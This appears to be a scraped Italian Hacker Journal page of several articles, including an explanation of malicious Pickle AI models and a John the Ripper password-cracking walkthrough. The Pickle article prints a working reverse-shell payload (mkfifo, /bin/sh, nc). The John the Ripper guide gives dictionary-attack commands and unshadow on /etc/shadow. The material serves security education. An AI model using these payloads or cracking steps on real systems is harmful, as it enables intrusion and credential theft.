Connect with us

Articoli

Mastodon il social network decentralizzato per Hacker

Redazione

Pubblicato

il

Un social network non commerciale, federato e decentralizzato, quello che molte community di ethical hacker stanno scegliendo per confrontarsi

Agli albori di Internet c’era IRC, acronimo di Internet Relay Chat, un sistema di messaggistica testuale basato su canali indipendenti e non controllati. Ai tempi d’oro, cioè alla fine del secolo scorso, più di un milione di utenti, in gran parte geek, utilizzavano oltre 500.000 canali per scambiarsi idee e documenti. Il tutto nella maniera più libera possibile.

Poi con il nuovo millennio sono arrivati i social network e se all’inizio un’iniziativa come Twitter poteva sembrare uno spazio libero e indipendente, ben presto ci si rese conto che non era proprio così. Tutte le interazioni, infatti, avvengono su server controllati dall’azienda e sono perciò centralizzate.

Per non parlare poi di Facebook e degli altri social che non solo hanno un animo commerciale, ma anche la tendenza a influenzare direttamente i contenuti degli utenti. Stanca di doversi rifugiare negli anfratti del Dark Web, una piccola community di sviluppatori di tutto il mondo ha deciso così di mettere a punto una propria rete sociale, federata ma allo stesso tempo gestita separatamente in “istanze” utilizzando il progetto di Eugen Rochko, un tedesco 24enne e del suo Mastodon.

Mastodon può essere definita come una rete di microblogging decentralizzata che utilizza il protocollo ActivityPub per interconnettere tra loro più istanze. Un’istanza non è altro che un server a cui dovremo registrarci e che a sua volta potrà collegarsi a migliaia di altre istanze sparse per il mondo. Il meccanismo assomiglia a quello della posta elettronica, in cui un indirizzo email è collegato a un server ma può comunque comunicare con tutti gli altri indirizzi. In Italia l’istanza principale è Mastodon Italia che può essere raggiunta all’indirizzo mastodon.uno, ma ce ne sono molte altre come sociale. network, mastodon.sociale. network o mastodon.partecipa. digital [LISTA ISTANZE]. A differenza degli altri social, per registrarsi non è necessario inserire il proprio numero di telefono ed è possibile collegarsi solo con un nickname, basta solo fornire un indirizzo email valido

Una volta registrati, il nostro nome utente assomiglierà a quello della posta elettronica. Così, per esempio, chi scrive ha come nome del suo profilo @[email protected]. TANTI PICCOLI TOOT Su Mastodon i messaggi si chiamano Toot (cioè il verso dell’elefante, simbolo del social) e nell’istanza italiana mastodon. uno è prevista la lunghezza massima di 500 caratteri per ogni toot. A loro volta i toot possono essere pubblici, visibili solo a chi ci segue e privati. Attenzione però, perché ogni istanza può usare proprie regole, politiche di moderazione, lingua e argomenti preferiti di discussione. Per questo è consigliabile scegliere l’istanza più vicina alla nostra sensibilità e ai nostri interessi.

Rimane comunque sempre possibile migrare il proprio profilo presso un’altra istanza senza perdere contenuti e follower. Per avere maggiori informazioni su Mastodon vi rimandiamo comunque al sito www.mastodon.it.

OLTRE MASTODON Oltre a connettersi tra loro, le istanze di Mastodon fanno parte del Fediverso (acronimo di Federated Universe). Si tratta di un ambiente globale a cui possono partecipare software differenti ma che hanno in comune tra loro l’utilizzo di standard aperti e liberi.

Articolo tratto dal numero 258 di Hacker Journal.

Approfitta subito della nostra offerta ,
hai la possibilità di abbonarti per un anno a 33,90 € con digitale in omaggio anziché 46,90€!

ABBONATI ORA – CLICCA QUI

 

[wpdevart_facebook_comment curent_url="http://developers.facebook.com/docs/plugins/comments/" order_type="social" title_text="Facebook Comment" title_text_color="#000000" title_text_font_size="22" title_text_font_famely="monospace" title_text_position="left" width="100%" bg_color="#d4d4d4" animation_effect="random" count_of_comments="7" ]

Articoli

Cervelli biologici sotto sale

Avatar

Pubblicato

il

Se fino a qualche anno fa tutti dovevano mettere le mani su una blockchain, ormai la nuova novità è l’intelligenza artificiale, in particolare i modelli generativi. In realtà la tecnologia non è così nuova: l’intelligenza artificiale esiste, sostanzialmente, da quando esistono i computer. Persino le reti neurali generative non sono una cosa particolarmente nuova. Il motivo per cui hanno avuto un improvviso successo è che sono finalmente diventate abbastanza efficienti da poterci fare davvero qualcosa. Il problema di simulare un cervello biologico è sempre stato l’enorme numero di operazioni da svolgere, soprattutto per l’allenamento della rete neurale, e procedendo sequenzialmente come fa una CPU ci vuole troppo tempo. Ma, da alcuni anni, le GPU hanno raggiunto un grado di sviluppo per cui ogni volta che ne viene rilasciata una nuova generazione (ogni 2 anni, circa) riesce a eseguire almeno 20 o 30 volte il numero di operazioni parallele di quella precedente. Questo permette oggi l’allenamento di reti neurali con decine di miliardi di neuroni in un tempo ragionevolmente breve (misurabile in ore, che varia a seconda dei casi), invece di impiegare anni, anche usando delle schede grafiche “consumer”. Naturalmente si tratta pur sempre di oggetti costosi, da alcune migliaia di euro, ma è un investimento tutto sommato abbordabile. Soprattutto per le aziende, che non vedono l’ora di appiccicare il bollino “made with AI” ai loro prodotti.

C’è in realtà un’altra cosa che, soprattutto nell’ultimo anno, ha dato un forte impulso proprio ai modelli generativi, cioè i modelli di rete neurale allenati per generare dei contenuti (immagini, musica, e testi). E questa cosa, come spesso capita, è la filosofia open source. Le principali aziende che hanno investito in questa tecnologia hanno, infatti, capito che il modo migliore per continuare a innovare è invogliare sviluppatori e appassionati da tutto il mondo a collaborare con nuove idee. È in questa logica che una piattaforma come HuggingFace ha trovato il proprio successo: sulla sua community è possibile pubblicare i propri modelli di rete neurale, provarli, e scaricare quelli di altri utenti. Questo permette a chiunque di non dover partire da capo, ma di prendere un modello preesistente e poi allenarlo con i propri dati, per adattarlo alle proprie necessità.

 

La stessa documentazione di Pickle segnala che il formato non è di per se sicuro, e che bisogna caricare solo file pkl provenienti da fonti affidabili. FONTE: https://docs.python.org/3/library/pickle.html

 

Naturalmente, alla fine si tratta in buona parte di un grosso “repository”, dal quale scaricare modelli per l’IA, un po’ come GitHub è un grosso contenitore in cui chiunque può caricare qualsiasi cosa. Sta all’utente assicurarsi di scaricare solo software fidato, invece di installare sul proprio sistema il primo malware che capita. E questo vale anche per i modelli IA.

 

Tanti numeri in fila per uno

È molto importante capire che, semplificando un po’, alla fine un “modello” di IA è una collezione di “pesi”, cioè una sfilza di numeri che stabilisce come siano collegati tra loro i neuroni della rete. Cambiando i pesi, la rete neurale si comporta in modo diverso. È meno prevedibile del cambiare una riga di codice in un programma tradizionale ma, alla fine dei conti, non è altro che un algoritmo che esegue operazioni sulla CPU (o sulla GPU, ma l’inferenza funziona bene anche su CPU). Essendo molto complesso e poco prevedibile, è improbabile (seppure non impossibile), che qualcuno possa realizzare un malware cambiando a mano i pesi di un modello. Almeno al giorno d’oggi.

Ma non è tutto qui: c’è un dettaglio importante del meccanismo di memorizzazione e condivisione dei modelli per Python, il linguaggio di programmazione più diffuso per l’intelligenza artificiale. Un dettaglio che può offrire a un malintenzionato la possibilità di eseguire direttamente comandi sul sistema su cui viene caricato il modello, fino a prenderne il controllo remoto. Hugging Face supporta i principali motori per AI basati su Python, in particolare TensorFlow e PyTorch. I modelli caricati su HF sono degli archivi che contengono diversi file. Uno di questi è il config.json, che contiene le informazioni necessarie per configurare il motore (per esempio PyTorch) con la corretta struttura prevista della rete neurale che si vuole creare. Un altro file importante è il modello vero e proprio, il set dei pesi della rete neurale, che viene memorizzato nel formato Pickle.

Pickle è un “serializzatore” per oggetti Python. Il modello, infatti, non è altro che un array multidimensionale, e per scriverlo su un file bisogna mettere in serie tutti i vari numeri. Sostanzialmente, un po’ come la prospettiva è uno strumento per rappresentare su un foglio degli oggetti tridimensionali. Pickle è un formato binario piuttosto flessibile, si possono serializzare non solo oggetti “statici” come gli array, ma anche intere funzioni: all’interno del file vengono infatti scritte delle istruzioni in una sorta di bytecode, che è molto più efficiente per il caricamento nella RAM rispetto a leggere da un file JSON oppure all’interpretazione di codice Python. Per esempio, un semplice array monodimensionale si può serializzare così:

pickled = pickle.dumps([‘pickle’, ‘me’, 1, 2, 3])

E il bytecode Pickle risultante è questo:

   0: \x80 PROTO      4

    2: \x95 FRAME      25

   11: ]    EMPTY_LIST

   12: \x94 MEMOIZE    (as 0)

   13: (    MARK

   14: \x8c     SHORT_BINUNICODE ‘pickle’

   22: \x94     MEMOIZE    (as 1)

   23: \x8c     SHORT_BINUNICODE ‘me’

   27: \x94     MEMOIZE    (as 2)

   28: K        BININT1    1

   30: K        BININT1    2

   32: K        BININT1    3

   34: e        APPENDS    (MARK at 13)

   35: .    STOP

 

Per un array così semplice sembra uno spreco, ma in realtà per oggetti molto più grandi (i modelli AI pesano spesso molti GigaByte) questo meccanismo rende molto più efficiente il caricamento. Questo però significa che in un file Pickle è possibile inserire qualunque tipo di istruzione, eventualmente anche codice malevolo. Questa non è di per sé una vulnerabilità, è solo una caratteristica di questo formato. La vulnerabilità sta nel comportamento degli utenti: bisogna capire che Pickle è un formato binario, difficile da “disassemblare”, e quindi i modelli per AI devono essere trattati come delle “blackbox”. Cioè, devono essere considerati come sempre potenzialmente pericolosi, e bisogna scaricarli solo da fonti sicure, esattamente come si farebbe per un programma binario. Bisogna, insomma, sempre ricordare che si sta eseguendo un software sul proprio sistema, quindi è necessario essere sicuri che questo non faccia nulla di malevolo. Infatti, inserire degli shellcode in un file Pickle è estremamente semplice:

import pickle

import base64

import os

class RCE:

    def __reduce__(self):

        cmd = (‘rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | ‘

               ‘/bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f’)

        return os.system, (cmd,)

if __name__ == ‘__main__’:

    pickled = pickle.dumps(RCE())

 

Che poi viene tradotto nel file pkl più o meno in questo modo:

0: \x80 PROTO      4

[…]

376: R REDUCE

377: q BINPUT 37

379: X BINUNICODE ‘ignore’

390: q BINPUT 38

392: c GLOBAL ‘posix system’

406: q BINPUT 39

408: X BINUNICODE “rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f”

474: q BINPUT 40

476: \x85 TUPLE1

477: q BINPUT 41

479: R REDUCE

480: q BINPUT 42

482: u SETITEMS (MARK at 33)

 

Quello che stiamo serializzando non è semplicemente la stringa del comando shell da eseguire, ma proprio la chiamata alla funzione os.system, quindi Pickle quando esegue il bytecode finisce per lanciare direttamente il comando sulla shell di sistema. A essere inserito nel file Pickle è infatti proprio il codice della funzione os.system se scriviamo:

return os.system()

la funzione viene eseguita e otteniamo solo il suo output.

Se invece scriviamo:

return os.system

otteniamo un puntamento alla funzione stessa, pronta per essere eseguita in un secondo momento. E quel momento arriva quando il Pickle viene deserializzato e caricato in memoria. I ricercatori di Wiz, società di sicurezza informatica, hanno provato a prendere addirittura un modello realmente funzionante, GPT2, e aggiungere delle istruzioni alla fine, proprio per eseguire dei comandi sulla shell. E funziona perfettamente, senza nemmeno provocare errori durante il caricamento nella rete neurale di PyTorch. Questo significa che l’utente che scarica e esegue il modello sul proprio PC o server non si accorge nemmeno di quello che sta succedendo: dal suo punto di vista, il modello linguistico funziona correttamente.

 

Un modello GPT2 opportunamente modificato può essere in grado di rispondere normalmente alle domande (sopra), ma anche di lanciare comandi sulla shell (sotto). FONTE: https://www.wiz.io/blog/wiz-and-hugging-face-address-risks-to-ai-infrastructure

 

Entità della vulnerabilità

Visto il gran numero di utenti e aziende che provano a utilizzare reti neurali generative, e visto che i modelli Pickle per PyTorch sono di fatto il principale standard in questo campo, il pericolo è piuttosto diffuso. Ma è importante ricordare che non tutti i modelli disponibili su HuggingFace sono malevoli. In particolare, non lo sono di certo quelli prodotti da grandi aziende o da community open source. Sicuramente, il fatto che siano binari rende difficile persino per i gestori di Hugging Face scansionarli alla ricerca di malware. E, considerando anche il fatto che i modelli generativi vengono tipicamente, utilizzati su macchine (fisiche o virtuali) piuttosto potenti, c’è il rischio che qualche malintenzionato possa mettere in circolare un modello che gli offre delle shell remote, per ritrovarsi così con una grossa botnet al suo comando.

 

HuggingFace sta mettendo a punto SafeTensors, un formato per la serializzazione che dovrebbe essere sicuro “by design” e comunque veloce come Pickle. FONTE: https://github.com/huggingface/safetensors

 

La soluzione

Essendo questa possibilità di inserire chiamate di sistema dentro un file Pickle, una normale caratteristica del formato, non c’è una vera soluzione. L’unico modo per essere protetti è una catena di fiducia tra tutti i vari passaggi, dal primo autore del modello a chi lo ha integrato allenandolo con altri dataset. Spesso, infatti, si trovano versioni “personalizzate” di modelli pubblicamente disponibili, più adatte a qualche particolare contesto (per esempio, allenate con documenti medici, oppure sportivi). È spesso questi modelli vengono rielaborati e integrati a loro volta. Ma basta che uno di questi “intermediari” non sia affidabile per rendere potenzialmente insicuro il modello finale. Bisogna ripensare ai tempi in cui si scaricavano eseguibili crackati da eMule: quante volte è capitato di provare a eseguire l’ultima versione di Photoshop, solo per accorgersi che in realtà (nella migliore delle ipotesi) era uno spyware che farciva il browser di banner e popup, magari inviando anche email di spam a tutti i contatti? Quando utilizziamo un software senza conoscerne la provenienza dobbiamo sempre mettere in conto la possibilità che chi ce lo ha condiviso possa averci inserito un malware. Un modo per, letteralmente, contenere i potenziali danni è la containerizzazione. Se, infatti, PyTorch e il modello vengono caricati dentro un container a se stante, separato dal resto delle applicazioni che lo andranno a utilizzare, è possibile limitare le risorse che potrà utilizzare, eventualmente impedirne l’accesso a internet (evitando shell remote), e soprattutto evitare un accesso diretto a file sensibili (che verranno passati al momento via API e tenuti in memoria solo per il tempo di elaborazione).

A cura di Luca Tringali

 

Leggi anche: “La cybersecurity nell’era dell’IA


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

Come migliorare la velocità del sito WordPress con un hosting ottimizzato

Avatar

Pubblicato

il

By

Hosting di qualità - Serverplan

La nostra è l’epoca digitale per eccellenza. Ciò significa che la maggior parte di noi non solo usa internet come utente, ma anche e soprattutto per spirito imprenditoriale. E chi gestisce o intende aprire un sito WordPress non può sottovalutare un aspetto in particolare: la velocità.

Premessa: la velocità influenza l’esperienza del sito a 360°. Non solo migliora il tempo di caricamento, ma dà la possibilità agli utenti di navigare sul sito senza intoppi. Cosa fanno gli utenti quando il sito carica in modo lento? Ne trovano un altro.

C’è un modo, però, per migliorare questo aspetto: l’hosting ottimizzato. Questo servizio, appositamente progettato, offre prestazioni elevate per i siti WordPress. Un esempio concreto è l’hosting di Serverplan, che non solo garantisce tempi di caricamento rapidi, ma integra anche un nuovo sitebuilder AI, incluso in alcuni piani. Questo strumento permette di creare e personalizzare il proprio sito in modo semplice e intuitivo, sfruttando l’intelligenza artificiale per ottimizzare automaticamente la struttura e le prestazioni del sito, senza richiedere competenze tecniche avanzate.

Visita questa pagina per scoprire le soluzioni di hosting WordPress offerte da Serverplan e il nuovo sitebuilder AI, ideale per migliorare la tua presenza online con un sito veloce ed efficiente.

Perché la velocità del sito è importante?

Per chi gestisce un progetto online, la velocità di caricamento di un sito web ne determina il successo stesso: alcuni dei motivi per cui è tanto essenziale dedicare attenzione a questo aspetto li abbiamo già elencati.

Come anticipato, un sito web lento è a dir poco frustrante per gli utenti e aumenta nettamente il tasso di abbandono. L’obiettivo è di offrire un’esperienza fluida e piacevole, così da incoraggiarli a rimanere sulla piattaforma ed esplorare i contenuti, con un ritorno importante sul coinvolgimento e sulla fidelizzazione.

Non solo: la velocità è tra i fattori di ranking utilizzati dai motori di ricerca come Google per valutare le prestazioni di un sito. Se non carica bene, sicuramente possono esserci delle ripercussioni in termini di visibilità nei risultati di ricerca e posizionamento organico.

L’hosting influenza la velocità del sito

Prima di tutto, l’hosting influenza non solo la velocità del sito, ma anche le prestazioni stesse. Pertanto, propendere per una soluzione ottimizzata significa credere davvero nel proprio progetto e investire al meglio.

Con un hosting di qualità, si vanno a ridurre i tempi di caricamento delle pagine e molti fornitori come Serverplan si impegnano per fare la differenza per i propri clienti.

Ci sono, nello specifico, dei fattori che influenzano la velocità del sito, ovvero la localizzazione dei server, l’uso di Content Delivery Network (CDN) e la capacità di uptime.

Naturalmente, il supporto tecnico è un ulteriore punto di riferimento, perché, nel momento in cui si verificano problemi al sito, dobbiamo essere assolutamente certi di intervenire nel minor tempo possibile.

La scelta dell’hosting giusto fa sempre la differenza

Le opzioni a nostra disposizione al giorno d’oggi sono molteplici: internet è un mondo (davvero) vasto; quindi, abbiamo la possibilità di valutare diversi fornitori di hosting.

Ciò che non dobbiamo mai dimenticare è di valutare le risorse e le prestazioni offerte dal provider: dobbiamo essere certi che possano soddisfare le nostre esigenze attuali e future del sito.

Per fare un esempio concreto: il sito può crescere nel tempo – si spera! – quindi sapere di poter offrire un servizio costante e veloce nel tempo è molto importante per gli imprenditori.

Altri criteri da non sottovalutare mai? Sicurezza, backup e, come anticipato, il supporto tecnico: con un hosting ottimizzato, navigare sul proprio sito non è mai stato così facile.


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

John The Ripper: lo scardina tutto!

Ecco come funziona lo strumento che facilita il cracking delle password da file ZIP, RAR, PDF e… forse anche del pinguino!

Avatar

Pubblicato

il

Ormai lo sappiamo: John the Ripper è un cracker di password gratuito e open source, che consente ai professionisti della sicurezza di decifrare una vasta gamma di password, indipendentemente dal fatto che siano crittografate o protette da codici di autenticazione. È uno strumento incluso nei repository predefiniti di molte distribuzioni Linux, tra cui Ubuntu e Debian, ed è installato di default nella maggior parte delle distribuzioni di penetration test, come Kali Linux e BlackArch Linux. Ma se la distribuzione Linux non lo integra, per installarlo si parte dal seguente comando:

$ apt install John

Mentre, se si adopera un computer Mac, è possibile procedere con l’installazione digitando da una finestra di terminale:

$ brew install john

È possibile installare il software anche su Windows: puntare il browser su https://www.openwall.com/john ed effettuare il download dello ZIP a 64 bit dei binari Microsoft Windows (a oggi 1.9.0-jumbo-1 64-bit Windows binaries.zip), quindi estrarre il contenuto dell’archivio. Basterà poi aprire il prompt dei comandi e spostarsi nella cartella scompattata per poter lanciare il comando John.

 

MODALITÀ DI CRACKING

John The Ripper utilizza una serie di tecniche sofisticate per decifrare gli hash delle password. Il principale metodo d’attacco impiegato è quello detto attacco a dizionario, in cui vengono processate una serie di parole predefinite o comuni, spesso estratte da wordlist gratuite e aggiornate o personalizzate dall’utente. Questo approccio mira a trovare corrispondenze esatte tra le parole del dizionario e gli hash delle password. Poiché molte persone continuano a riutilizzare le stesse password e non le modificano dopo una violazione di sicurezza, tali attacchi stanno diventando sempre più efficaci! Questo perché, in seguito a una nuova violazione, le credenziali compromesse vengono aggiunte da hacker o aspiranti tali ai più blasonati dizionari, accessibili online. Kali Linux fornisce già diversi eccellenti dizionari di password, il più utilizzato è Rockyou.txt, un semplice file di testo contenente un elenco di password comunemente utilizzate e trapelate durante diverse violazioni dei dati, altre risorse sono disponibili in repository online, per esempio su GitHub.
Oltre a operare in modalità Single Crack, può essere utilizzato anche in modalità Incremental Mode, eseguibile con il comando:

john –incremental hash.txt

In questa modalità per individuare la password vengono provate tutte le possibili combinazioni di caratteri. L’External mode consente, invece, all’utente di usare delle funzioni personalizzate scritte ad hoc, per esempio in linguaggio C.

 

Utilizzo responsabile del software

L’impiego di John the Ripper, così come di qualsiasi altro strumento di cracking delle password, può costituire un’attività sia legale che illegale, a seconda del contesto e dell’intento dell’utilizzatore. È fondamentale che l’utente sia consapevole e rispetti appieno le normative vigenti nel proprio paese o giurisdizione in materia di sicurezza informatica e privacy. In tal senso, prima di avvalersi di tali strumenti, è necessario ottenere il consenso esplicito e l’autorizzazione legale da parte dei titolari delle risorse informatiche coinvolte, nonché rispettare scrupolosamente le policy in tema di sicurezza dei dati. Nel caso in cui sorgano dubbi circa la legalità di determinate attività di cracking delle password, è vivamente consigliabile ricorrere alla consulenza di un esperto legale specializzato in diritto informatico, al fine di valutare attentamente la situazione e ricevere le necessarie indicazioni e chiarimenti in merito. Solo attraverso un approccio etico e conforme alla normativa vigente sarà possibile utilizzare questi strumenti in modo responsabile e legalmente corretto.

 

IN PRATICA

COSÌ CRACKANO LE PASSWORD DEI FILE ZIP, RAR E PDF
Come i pirati usano John The Ripper e un tool di supporto per craccare i file protetti da password.

 

LO ZIP È PROTETTO
Supponiamo l’hacker abbia recuperato un nostro file ZIP protetto dalla password “cielo1234”; ogniqualvolta egli proverà ad accedere al contenuto del file, il sistema gli chiederà la password di accesso; il malintenzionato non demorde e usa John The Ripper per individuarla.

 

ZIP2JOHN E RAR2JOHN
Per creare l’hash da far elaborare a John The Ripper, l’hacker ricorre al tool zip2john. Nello specifico, dalla sua distro Kali lancia il comando sudo zip2john fileziprotetto.zip > hash-hj.txt (Invio). In pochi secondi il sistema genererà il file hash-hj.txt. Per i file .rar l’hacker avvierà il comando rar2john.

 

IN AZIONE
Il malintenzionato può ora ricorrere alla potenza di John The Ripper per estrapolare la password di accesso allo ZIP. Per farlo proverà, per esempio, un attacco a dizionario con il comando john –format=zip hash-hj.txt –wordlist=/usr/share/wordlists/rockyou.txt (Invio).

 

LA PASSWORD È SERVITA!
Con il comando è stato indicato a JTR di utilizzare il dizionario rockyou.txt (presente di default nella distribuzione Kali Linux, andrà solo scompattato essendo uno ZIP) per craccare la password. Dopo qualche minuto, il tool indicherà la password individuata, in questo caso “cielo1234”.

 

E SE C’ È UN PDF?
Anche nel caso di un PDF protetto da password, John The Ripper può scardinare la protezione, in questo caso il malfattore ricorre a un tool simile a zip2john o rar2john, nello specifico lancia il comando pdf2john, ad esempio pdf2john filepdfprotetto.pdf > hash-hj-pdf.txt (Invio).

 

ET VOILÀ
A questo punto John The Ripper può completare il lavoro, supponendo sempre un attacco a dizionario viene impartito il comando john –format=pdf hash-hj.pdf.txt –wordlist=1000000-password-seclists.txt e ottenere dopo qualche minuto la password. Notate l’utilizzo, a scopo dimostrativo, di un diverso dizionario da rockyou.

 

TESTIAMO LA ROBUSTEZZA DELLE PASSWORD
John non è solo utile agli hacker, può anche essere impiegato da esperti di sicurezza per valutare l’efficacia delle password usate in Linux

DOVE SONO NASCOSTE LE PASSWORD?
Le password Linux criptate sono salvate nei percorsi /etc/passwd (contiene info su username, user id, descrizione dell’account etc) ed /etc/shadow, che memorizza l’hash delle password, la data di scadenza e dell’ultimo cambio password effettuato e altre informazioni.

 

INDICHIAMO I FILE DA ANALIZZARE
Il comando unshadow è un’utility utilizzata su Linux per combinare i file /etc/passwd e /etc/shadow al fine di preparare i dati delle password per ulteriori operazioni o analisi. In questo caso per fornirle a John: unshadow /etc/passwd /etc/shadow > pwdlinux.txt.

 

PREPARIAMO IL FILE HASH
Lanciando ora il commando john –format=crypt –wordlist=/usr/share/wordlists/rockyou.txt pwdlinux.txt, il tool proverà a individuare le password, adoperando il dizionario rockyou.txt, di tutti gli utenti contenuti nel file precedentemente creato: pwdlinux.txt.

 

MOSTRIAMO LE PASSWORD
L’operazione può richiedere diversi minuti. Invece del dizionario rockyou si può adoperare qualunque altro dizionario, oppure adoperare John The Ripper sfruttando qualche altra modalità di utilizzo di cui abbiamo accennato in questo (speriamo gradito) approfondimento.

 

Leggi anche: “Rubate 10 miliardi di password


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

L’avanzata dei dispositivi pieghevoli

Smartphone piegati attorno al polso, computer il cui schermo si apre e si chiude a metà, dispositivi tutti di vetro
(o quasi): sembrava fantascienza, ma ormai è tutto vero!

Avatar

Pubblicato

il

È nata come un’idea dei designer di Hollywood. Mostrare apparecchi futuristici nei film e nelle serie TV. Da Westworld a The Expanse passando per Star Trek, Altered Carbon e Black Mirror: non c’è set del futuro che non ne abbia un buon numero. Perché? La risposta è semplice: sembrano tecnologie del futuro. Perché il problema degli scenografi di film e telefilm è rendere credibili le serie di fantascienza con gadget che agli occhi di noi spettatori moderni, che siamo abituati ogni anno a vedere le meraviglie di nuovi smartphone, tablet e laptop, sembrino davvero “del domani”. Come si fa? Semplice: si creano gadget impossibili: tutti di vetro e per di più pieghevole.

 

Il futuro è qui

Adesso, però, la tecnologia è arrivata e i dispositivi con schermo pieghevole, e addirittura curvo, ci sono. Pian piano i prezzi stanno scendendo e le novità si susseguono. I primi a commercializzare questi dispositivi sono stati i colossi dell’ambito telefonico, ma anche altri settori stanno seguendo. Per esempio, la possibilità di creare computer portatili che si aprono e mostrano schermi dalle dimensioni doppie. Oppure, poter mettere al polso un dispositivo metà orologio e metà telefono con lo schermo curvo che corre attorno al polso. E i televisori da cento pollici “arrotolabili”, che scompaiono dentro la base quando non servono. Senza contare gli schermi completamente trasparenti, le superfici dei ripiani di casa o dell’ufficio che diventano smart mostrando informazioni. Samsung ha mostrato una serie di prototipi al recente CES con apparecchi tutto schermo e tutti pieghevoli: verticalmente, orizzontalmente, a soffietto, a pagine alterne come dei cataloghi.

È tutto merito degli schermi Oled. La tecnologia che ci ha dato i gadget pieghevoli è quella degli schermi Oled in plastica, non in vetro. Sottili e flessibili, sono loro che hanno reso possibile la creazione di nuovi design e fattori di forma. I concept più estremi mostrano apparecchi arrotolabili che in un futuro non troppo lontano arriveranno nelle nostre tasche e sui nostri polsi.

 

Lo sbarco dei pieghevoli

Le tecnologie oggi ci sono e soprattutto è stato risolto il problema della piega. Perché, se è vero che gli schermi che si possono ripiegare, esistono grazie agli Oled con base in plastica e non in vetro e con spessori ultrasottili, a fare la differenza per ridurre l’attrito dell’uso è il meccanismo di attuazione. Dalle ghiere meccaniche pensate da Lenovo per i suoi laptop tutto schermo e dalla controllata Motorola per gli smartphone, agli ingegnosi sistemi made in Corea che oggi sembrano tra i più affidabili.
Il telefono tutto schermo da polso è ancora un prototipo. L’ha realizzato Samsung, si chiama Cling Band ed è stato mostrato all’ultimo Mobile World Congress. È un bracciale intelligente, un incrocio tra orologio (più piccolo) e smartphone (più grande). Si piega nel senso che si adatta alla dimensione del polso e rimane fermo là, fornendo in maniera naturale tutte le informazioni che servono (dai messaggi alla navigazione Web), oltre ai dati raccolti dai sensori per il monitoraggio dei parametri vitali, come la frequenza cardiaca e i livelli di ossigeno nel sangue.
Per questo come per altri prototipi e concept ancora non c’è una data di uscita, ma la certezza è che ormai le tecnologie sono pronte. E i maghi degli effetti speciali di Hollywood adesso si dovranno inventare qualcosa di nuovo per poterci stupire ancora.

 

*illustrazione articolo progettata da Freepik

Leggi anche: “Steam Deck Oled è disponibile


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

Come giocare in sicurezza

Avatar

Pubblicato

il

By

dice-5012425_1280 - Foto di Aidan Howe da Pixabay

Il gioco online è una perfetta manifestazione del tempo moderno. Ci si ritrova davanti ad un pc per collegarsi a siti riconducibili ad un certo tipo di attività ludica. Tra queste il casinò è, di certo, una delle più gettonate. Giocare si può, ma una certa dose di sicurezza e raccomandazione è doverosa in questi casi, onde evitare di incappare in brutte situazioni.

Considerando anche che la pubblicità sul gioco d’azzardo è molto limitata a causa di una regolamentazione molto ferrea, è importante – se si vuol provare a tentare la fortuna – che si giochi in tutta sicurezza.

Perché anche i soldi persi per errore, non solo quelli del gioco, non sono recuperabili. O, comunque, è molto difficile magari rintracciare l’autore del furto.

Consigli utili sulla sicurezza nel casinò online

La sicurezza e l’autocontrollo sono due elementi essenziali per chi gioca al casinò. Ancor di più quando si gioca online e non si ha la percezione esatta del luogo fisico. La tentazione di giocare ancor di più aumenta in questi casi.

Diventa ancora più determinante il tema della sicurezza online. La prima accortezza a cui pensare nel momento in cui si apre un account su un sito specializzato riguarda la scelta delle password.

Al fine di evitare che qualche malintenzionato possa intrufolarsi nel suddetto account a fini di truffa sarebbe preferibile scegliere una password quanto più complessa possibile. L’aggiunta di lettere maiuscole, oltre che minuscole, insieme a caratteri speciali aiuta tantissimo in questo senso.

Scegliere una password unica per gli account in comune è una mossa altrettanto intelligente, fermo restando la complessità imprescindibile della password stessa. Uno standard di sicurezza ancora più elevato lo si raggiunge nel momento in cui l’autenticazione all’interno del sito avviene su un doppio binario.

Oltre alle password da inserire può essere richiesto all’utente di attivare l’identificazione tramite codice di notifica sull’app installata. Un parametro di sicurezza in più che può finire quantomeno per scoraggiare gli hacker.

Utilizzare il firewall come barriera contro gli accessi non autorizzati, sia a livello hardware che software, dà un’ulteriore spinta all’efficienza della sicurezza online Giocare al casinò è una scommessa a tutti gli effetti e l’obiettivo principale deve essere orientato ad un certo senso di responsabilità, anche magari prima testando qualcosa senza spendere un euro e cercando le informazioni dei bonus con giri gratis ai casino. In caso contrario si finisce per perdere tanti soldi.

Metodi di pagamento con sicurezza certificata per gioco online

Il casinò online è un’ottima opportunità per fare soldi “facili”. Sulla carta, ovviamente. Basterebbe indovinare il numero giusto alla roulette o le carte vincenti al poker per incrementare i propri guadagni. Anche se non è così semplice. Ma in questi casi bisogna stare ben attenti a ciò che si fa.

I metodi di pagamento più sicuri e attendibili fanno riferimento a portafogli elettronici come possono essere Paypal, Skrill, Neteller, SafeCharge. Aumentando il livello di sicurezza di un account connesso ad un sito aumenta, di conseguenza, l’affidabilità di un metodo di pagamento con carta di credito o debito Mastercard, Visa, Maestro, Postepay e quant’altro.

Altre opzioni riguardano bonifici bancari, voucher ed Apple Pay. I depositi su casinò online sono pressoché immediati, mentre le tempistiche dei prelievi dalle 24 ore di Paypal fino ai 5 giorni lavorativi previsti per un semplice bonifico. In ogni caso stabilire un limite di deposito e puntate giornaliero, oltre che mensile, aiuta a contenere le perdite in maniera sostanziale.

Come scegliere piattaforme più affidabili per il casinò online

Il casinò online è uno dei giochi più praticati dagli utenti sia sul piano ludico che professionale. Naturalmente, non tutti i siti di riferimento sono da seguire. Bisogna affidarsi solamente a quelli certificati e che garantiscono una certa tutela in termini di gioco e condizioni.

I criteri da seguire nella selezione dei migliori operatori sul mercato riguardano, anche e soprattutto, parametri di sicurezza, bonus, metodi di pagamento e assistenza clienti.

Ormai, infatti, questi pre-requisiti sono un qualcosa che viene dato per assoluta certezza anche se spesso può non essere così. Il consiglio è quello di affidarsi sempre a casinò certificati e che abbiano buone recensioni. Possibilmente recensioni veritiere e fatte da utenti che effettivamente abbiano testate quel casinò online.

